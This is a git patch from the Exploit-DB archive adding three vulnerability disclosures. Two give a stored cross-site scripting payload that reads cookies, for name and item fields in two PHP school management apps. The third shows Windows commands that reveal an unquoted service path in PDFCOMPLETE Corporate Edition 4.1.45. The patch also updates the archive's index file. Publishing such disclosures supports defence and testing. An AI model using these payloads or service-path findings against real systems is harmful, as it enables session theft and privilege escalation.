From 774f3786de9a1955a47663aaaa1ca8e960cff34c Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 13 Feb 2021 05:01:54 +0000
Subject: [PATCH] DB: 2021-02-13

3 changes to exploits/shellcodes

PDFCOMPLETE Corporate Edition 4.1.45 - 'pdfcDispatcher' Unquoted Service Path
School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting
School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting
---
 exploits/php/webapps/49559.txt   | 18 ++++++++++++++++++
 exploits/php/webapps/49560.txt   | 19 +++++++++++++++++++
 exploits/windows/local/49558.txt | 28 ++++++++++++++++++++++++++++
 files_exploits.csv               |  3 +++
 4 files changed, 68 insertions(+)
 create mode 100644 exploits/php/webapps/49559.txt
 create mode 100644 exploits/php/webapps/49560.txt
 create mode 100644 exploits/windows/local/49558.txt

diff --git a/exploits/php/webapps/49559.txt b/exploits/php/webapps/49559.txt
new file mode 100644
index 000000000..ec76281f4
--- /dev/null
+++ b/exploits/php/webapps/49559.txt
@@ -0,0 +1,18 @@
+# Exploit Title: School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting
+# Date: 2021-02-11
+# Exploit Author: Pintu Solanki
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14155/school-file-management-system.html
+# Software: : School File Management System 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+
+# Vulnerable Page: http://localhost/School%20File%20Management%20System/student_profile.php
+# Vulnerable functionality: 'Update Account'
+# Vulnerable Input Field : {Firtstname} {Lastname}
+# Payload used:
+
+"><script>alert(document.cookie)</script>
+
+# POC: Whenever we will go to the page (http://localhost/School%20File%20Management%20System/student_profile.php) where the script is injected, the stored script will be executed.
+# You will see your Javascript code (XSS) executed.
\ No newline at end of file
diff --git a/exploits/php/webapps/49560.txt b/exploits/php/webapps/49560.txt
new file mode 100644
index 000000000..da6f727ca
--- /dev/null
+++ b/exploits/php/webapps/49560.txt
@@ -0,0 +1,19 @@
+# Exploit Title: School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting
+# Date: 2021-02-11
+# Exploit Author: Suresh Kumar
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/12613/php-attendance-monitoring-system-barcode-scanning.html
+# Software: School Event Attendance Monitoring System 1.0
+# Tested on Windows 10 XAMPP
+
+# This application is vulnerable to Stored XSS vulnerability.
+# Vulnerable Page: http://localhost/attendance/sanction
+# Vulnerable functionality: 'Add Sanction '
+# Vulnerable Input Field : Item Name
+# Payload used:
+
+"><script>alert(document.cookie)</script>
+
+# POC: Whenever we will go to the page (http://localhost/attendance/sanction)
+where the script is injected, the stored script will be executed.
+# You will see your Javascript code (XSS) executed.
\ No newline at end of file
diff --git a/exploits/windows/local/49558.txt b/exploits/windows/local/49558.txt
new file mode 100644
index 000000000..7aafa945b
--- /dev/null
+++ b/exploits/windows/local/49558.txt
@@ -0,0 +1,28 @@
+# Exploit Title: PDFCOMPLETE Corporate Edition 4.1.45 - 'pdfcDispatcher' Unquoted Service Path
+# Discovery by: Ismael Nava
+# Discovery Date: 02-11-2020
+# Vendor Homepage: https://www.pdfcomplete.com/cms/dpl/tabid/111/Default.aspx?r=du2vH8r
+# Software Links : https://pdf-complete.informer.com/download/
+# Tested Version: 4.1.45
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 10 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
+PDF Document Manager       pdfcDispatcher     C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService    Auto
+
+
+C:\>sc qc pdfcDispatcher
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: pdfcDispatcher
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : PDF Document Manager
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e89ef55e2..8a358c782 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11234,6 +11234,7 @@ id,file,description,date,author,type,platform,port
 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
 49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
 49259,exploits/linux/local/49259.c,"libbabl 0.1.62 - Broken Double Free Detection (PoC)",2020-12-15,"Carter Yagemann",local,linux,
+49558,exploits/windows/local/49558.txt,"PDFCOMPLETE Corporate Edition 4.1.45 - 'pdfcDispatcher' Unquoted Service Path",2021-02-12,"Ismael Nava",local,windows,
 49322,exploits/windows/local/49322.py,"10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)",2020-12-22,"Florian Gassner",local,windows,
 49336,exploits/windows/local/49336.txt,"MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path",2021-01-04,"Thalia Nieto",local,windows,
 49342,exploits/python/local/49342.txt,"Knockpy 4.1.1 - CSV Injection",2021-01-04,"Dolev Farhi",local,python,
@@ -43528,6 +43529,8 @@ id,file,description,date,author,type,platform,port
 49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
 49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)",2020-12-15,"Andrea Bruschi",webapps,php,
 49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
+49559,exploits/php/webapps/49559.txt,"School File Management System 1.0 - 'multiple' Stored Cross-Site Scripting",2021-02-12,"Pintu Solanki",webapps,php,
+49560,exploits/php/webapps/49560.txt,"School Event Attendance Monitoring System 1.0 - 'Item Name' Stored Cross-Site Scripting",2021-02-12,"Suresh Kumar",webapps,php,
 49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
 49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
 49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,